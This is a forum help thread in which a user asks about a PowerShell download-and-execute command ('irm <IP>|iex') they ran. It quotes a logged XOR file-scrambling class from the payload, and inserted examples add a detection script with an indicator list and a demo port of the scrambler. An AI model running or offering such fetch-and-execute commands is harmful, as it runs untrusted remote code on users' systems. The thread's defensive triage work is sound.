Hey everyone, I need some advice about a PowerShell command I ran without realizing it could be dangerous. The command was "irm 47.93.182.118|iex", and after looking into it, I found out it likely took something from that IP address and executed it on my system.
I've checked my Windows event viewer and noticed several suspicious entries related to a command called "Add-Type" around the time I executed it. Here's a snippet from the event log:
Details:
CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="TypeDefinition"; value="using [System.IO];public class XorUtil{public static void XorFile(string p,byte key){var b=File.ReadAllBytes(p);for(int i=0;i<b.Length;i++)b[i]^=key;File.WriteAllBytes(p,b);}}"
I'm anxious because I can't find much information on what XorUtil or XorFile actually do, and I'm worried about potential malicious activity on my PC. Any help would be greatly appreciated. Thanks!
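The log lines quoted in the question are PowerShell module-logging entries (event ID 4103 in the Microsoft-Windows-PowerShell/Operational log). Below is an added example, not part of the original post, of how to pull those entries plus the script-block entries (ID 4104) for a time window and flag the indicators the question mentions. It assumes the relevant logging was enabled on the machine (the 4103 text in the question suggests module logging was), and the time window is a placeholder to adjust.

```powershell
# Added example, not from the original post: pull PowerShell module-logging (ID 4103,
# the "CommandInvocation/ParameterBinding" format quoted in the question) and
# script-block-logging (ID 4104) events from the Operational log for a time window
# and flag the indicators the question mentions.
# Assumption: the window below is a placeholder; set it to around when the command ran.

$Start = (Get-Date).AddDays(-7)   # set to shortly before "irm ...|iex" was run
$End   = Get-Date

# Regex indicators: the IP from the question, the download-and-run cmdlets and
# their aliases, and the class/method names seen in the Add-Type entry.
$Indicators = @(
    '47\.93\.182\.118',
    '\birm\b', 'Invoke-RestMethod',
    '\biex\b', 'Invoke-Expression',
    'Add-Type', 'XorUtil', 'XorFile'
)

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4103, 4104
    StartTime = $Start
    EndTime   = $End
} -ErrorAction SilentlyContinue

$hits = foreach ($e in $events) {
    # 4104 carries the script text in EventData (ScriptBlockText is the third property);
    # 4103 carries the CommandInvocation/ParameterBinding lines in the message body.
    $text = if ($e.Id -eq 4104) { [string]$e.Properties[2].Value } else { $e.Message }
    $matched = $Indicators | Where-Object { $text -match $_ }
    if ($matched) {
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Id         = $e.Id
            Indicators = $matched -join ', '
            # For Add-Type entries, lift the compiled source out of the parameter binding
            TypeDef    = if ($text -match 'name="TypeDefinition"; value="([^"]*)"') { $Matches[1] } else { $null }
            Text       = $text
        }
    }
}

$hits | Sort-Object Time | Format-Table Time, Id, Indicators, TypeDef -AutoSize -Wrap

# The interactive command itself is usually also in the PSReadLine history file,
# which is kept even when event logging was off.
$history = try { (Get-PSReadLineOption).HistorySavePath } catch { $null }
if ($history -and (Test-Path $history)) {
    Select-String -Path $history -Pattern '47\.93\.182\.118|\birm\b|\biex\b|Invoke-Expression'
}
```

Run it in the same PowerShell edition the command was typed into (Windows PowerShell 5.1 and PowerShell 7 write to different logs). An empty result does not prove nothing ran: script-block logging may have been off, and a 4104 entry for a large script is split across several events, so also search the TypeDef and Text columns for further Add-Type definitions and for the URL the downloaded script fetched next.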
3 Answers
Yeah, you should definitely be concerned about that command. It downloads a script and executes it, which is risky! The XorUtil class you saw is a simple encryption method that uses XOR to modify files, but it looks like the script also replaces files in Steam, which isn't good news. It's wise to handle this seriously—consider doing a fresh install of Windows to be safe!
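To make concrete what the XorFile method in the logged Add-Type definition does, here is an added example (not from the original post, and not the script the poster ran): a PowerShell port of that method, run on a constructed temp file. The port calls the .NET File methods directly because the logged "using [System.IO];" line is not valid C#. The key byte 0x5A is an assumption for the demonstration; the log entry does not show which key the script used. The last step goes beyond the post: it shows that a single-byte XOR key can be recovered from one known plaintext byte.

```powershell
# Added example, not from the original post or the script the poster ran: a PowerShell
# port of XorUtil.XorFile as seen in the 4103 log entry, demonstrated on a constructed file.
function Invoke-XorFile {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][byte]$Key
    )
    # Same logic as XorUtil.XorFile: read all bytes, XOR each with one key byte, write back in place
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = $bytes[$i] -bxor $Key
    }
    [System.IO.File]::WriteAllBytes($Path, $bytes)
}

function Get-Hex([byte[]]$b) { [System.BitConverter]::ToString($b) }

# Constructed sample input: not a real game file, just ASCII with a recognisable
# two-byte "magic" at the front standing in for a known file header.
$tmp = Join-Path ([System.IO.Path]::GetTempPath()) 'xorutil-demo.bin'
$original = [System.Text.Encoding]::ASCII.GetBytes('MZ constructed sample file contents')
[System.IO.File]::WriteAllBytes($tmp, $original)

# One pass with an assumed key of 0x5A (the real key is not visible in the log entry)
Invoke-XorFile -Path $tmp -Key 0x5A
$scrambled = [System.IO.File]::ReadAllBytes($tmp)
"After one pass the bytes changed: $((Get-Hex $scrambled) -ne (Get-Hex $original))"

# XOR is its own inverse: a second pass with the same key gives the original back
Invoke-XorFile -Path $tmp -Key 0x5A
$restored = [System.IO.File]::ReadAllBytes($tmp)
"Second pass with the same key restored the file: $((Get-Hex $restored) -eq (Get-Hex $original))"

# Beyond what the post shows: with a single-byte key, one known plaintext byte (such as
# a file-format magic byte) gives the key back directly, so a file scrambled this way
# is recoverable even when the key is not known.
$recoveredKey = $scrambled[0] -bxor [byte][char]'M'
'Key recovered from the known first byte: 0x{0:X2}' -f $recoveredKey

Remove-Item $tmp -ErrorAction SilentlyContinue
```

The point for triage: XorFile is not encryption in any meaningful sense, only an in-place single-byte scramble, so any file it touched can be put back if the key is known or can be derived from a known header byte. That says nothing about what else the downloaded script did, which is why the reinstall advice in the answers still stands.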
You're not alone in worrying! The Add-Type command allows you to add custom classes in PowerShell, so it's creating this XorUtil with a function to manipulate files. That IP address is no longer serving content (it returns a 403 error), which raises some red flags. Often, when an attack goes quiet like that, it might mean the perpetrator has pulled back before getting caught. Overall, unverified code run this way can lead to all kinds of malicious software getting installed, and it could be a good idea to reinstall your OS.
It looks like you may have fallen for a common scam often referred to as FakeCaptcha. These tricks usually prompt users to run suspicious commands in PowerShell, which could lead to malware being installed on your system. If you've saved any sensitive information, like passwords or payment details in your browser, make sure to update those right away. A full OS reinstall might be the best course of action here. Stay safe!
Yeah, when they say "reset," they usually mean to wipe everything and do a clean install. It’s the safest move!